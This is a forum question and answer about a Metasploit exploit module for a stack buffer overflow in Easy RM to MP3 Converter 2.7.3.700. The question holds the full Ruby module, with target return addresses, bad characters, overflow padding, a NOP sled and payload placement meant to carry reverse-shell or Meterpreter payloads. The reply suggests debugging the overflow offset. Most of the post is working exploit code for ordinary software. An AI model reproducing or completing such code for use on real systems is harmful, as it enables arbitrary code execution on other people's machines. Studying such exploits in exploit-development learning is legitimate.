Problems with metasploit's "Easyrmtomp3" exploit module

Question

I started learning exploit writing some time back and created a few exploits. One of them being an easy rm to mp3 converter, and it worked pretty well. However, now I thought about converting my exploits to metasploit modules, and followed the steps given in a number of articles. However, the only error that I am facing is that the payload is not working. Ultimately, I resorted to looking online for a similar module, and found one which is definitely supposed to work. However, I do not get back a meterpreter session or a shell, when using meterpreter payload. After making some changes, here is what I used:

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking
 
    include Msf::Exploit::FILEFORMAT
 
    def initialize(info = {})
        super(update_info(info,
            'Name' => 'Easy RM to MP3 Converter (2.7.3.700) Stack Buffer Overflow',
      'Description'    => %q{
                This module exploits a stack buffer overflow in versions 2.7.3.700
               creating a specially crafted .m3u8 file, an attacker may be able 
               to execute arbitrary code.
      },
            'License' => MSF_LICENSE,
            'Author' => 
               [
                 'Crazy_Hacker', # Original
        'buzz',
               ],
            'Version' => 'Version 1',
            'References' =>
                [
                  [ 'URL', 'http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload' =>
                {
                    'Space' => 1000,
                    'BadChars' => "\x00\x0a",
                    'StackAdjustment' => -3500,
                },
            'Platform' => 'win',
            'Targets' =>
                [
        
                  [ 'Windows XP SP2 (En)', { 'Ret' => 0x01A13F01} ], # Universal Address (MSRMCcodec02.dll)
                  [ 'Windows XP SP3 (Fr)', { 'Ret' => 0x01AAF23A} ], # FFE4 ,JMP, ESP from (MSRMCcodec02.dll)
                  [ 'Windows XP (Universal)', { 'Ret' => 0x773D4540} ], # JMP ESP in (SHELL32.DLL)
                ],
            'Privileged' => false,
            'DefaultTarget' => 1))
 
        register_options(
            [
                OptString.new('FILENAME', [ false, 'The file name.', 'buzz.m3u']),
            ], self.class)
    end
 
 
    def exploit

       sploit ="A"*26068 # rand_text_alphanumeric(26068) # Buffer Overflow
        sploit << [target.ret].pack('V')
        sploit << "\x90" * 30 # nopsled
        sploit << payload.encoded 
        sploit << "B"*1000
        buzz= sploit
        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(buzz)
 
    end
 
end

I tried out a number of payloads: meterpreter/reverse_tcp, shell/reverse_tcp, e.t.c., but none seem to work. Any solutions?

Answer 1

You should also provide more details about the OS you are using and the params you have provided to run the module.

As you can see the pointer to Ret differs depending on the OS.

Have you attached a debugger yet to see what happens within the application? From what I can see and know about the exploit is that your fuzzing string doesn't seem to be appropriate for the buffer

sploit ="A"*26068

It should be more than that. Attach a debugger and look if EIP has been overwritten.

Regards, T0X1C